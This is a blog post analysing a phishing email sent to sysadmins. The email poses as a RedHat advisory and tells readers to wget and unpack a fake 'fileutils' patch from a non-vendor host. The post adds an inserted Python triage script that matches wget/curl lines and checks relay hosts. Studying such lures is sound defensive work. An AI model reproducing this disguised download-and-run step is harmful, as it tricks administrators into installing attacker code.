Sven-S. Porst challenged me to talk about email encryption (PGP/S/MIME, or something), and to suggest to 5 others that they do the same… I realize that you aren’t all Mac folk, but it’s reasonably straightforward in Thunderbird, Outlook, Evolution, and several other mailers, so hopefully you’ll give it a whirl.
Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:
Original issue date: October 20, 2004
Last revised: October 20, 2004
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
- First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Very credible looking, except for a few little niggles:
Received: from mail.forcartex.com.tw (unknown [22.214.171.124]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for email@example.com; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)
Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ’nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail -- the HTML links to Redhat's real logo, linked from a Redhat server, and they even ran their HTML through Tidy!
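A triage check for the niggles above, as an added example that is not part of the original post: it flags a message claiming to be a vendor advisory when the relay in the topmost Received header, or the host a fetch command in the body points at, falls outside the vendor's domain. The `redhat.com` allow-list, the function names and the placeholder Subject line are assumptions of this example; the header and the wget line are copied from the message quoted above.

```python
import re
from urllib.parse import urlparse

# Assumption: the vendor's genuine mail relays and download hosts live under these domains.
VENDOR_DOMAINS = ("redhat.com",)

# Postfix-style hop: "from <HELO name> (<reverse-DNS name> [<ip>])"
RECEIVED = re.compile(r"^Received:\s+from\s+(\S+)\s+\((\S+)\s+\[", re.I | re.M)
# First non-option argument handed to a fetch command in the body
FETCH = re.compile(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(\S+)", re.I)

def under(host, domains=VENDOR_DOMAINS):
    """True if host is one of the domains or a subdomain of one (label-aligned)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)

def triage(raw_message):
    """Return (reason, host) findings for a message claiming to be a vendor advisory."""
    findings = []
    # Only the topmost Received header is examined: it is assumed to be the one
    # written by our own server. Headers below it are under the sender's control.
    hop = RECEIVED.search(raw_message)
    if hop:
        helo, rdns = hop.groups()
        if not under(helo):                 # name the client announced
            findings.append(("relay-not-vendor", helo))
        if rdns.lower() == "unknown":       # our server found no usable reverse DNS
            findings.append(("relay-no-reverse-dns", helo))
    for target in FETCH.findall(raw_message):
        url = target if "://" in target else "http://" + target
        host = urlparse(url).hostname or target
        if not under(host):
            findings.append(("download-not-vendor", host))
    return findings

# Sample built from the lines quoted in the post; the Subject line is a constructed placeholder.
SAMPLE = """\
Received: from mail.forcartex.com.tw (unknown [22.214.171.124])
 by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39
 for email@example.com; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)
Subject: (constructed placeholder)

- First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
- Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
"""

if __name__ == "__main__":
    for reason, host in triage(SAMPLE):
        print(f"{reason}: {host}")
```

A hit is a reason to verify the advisory through the vendor's own site before running anything from it; a clean result is not proof of authenticity, since the announced relay name is chosen by the sender.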
Let's be careful out there!
Fain would I climb, yet fear I to fall.
— Sir Walter Raleigh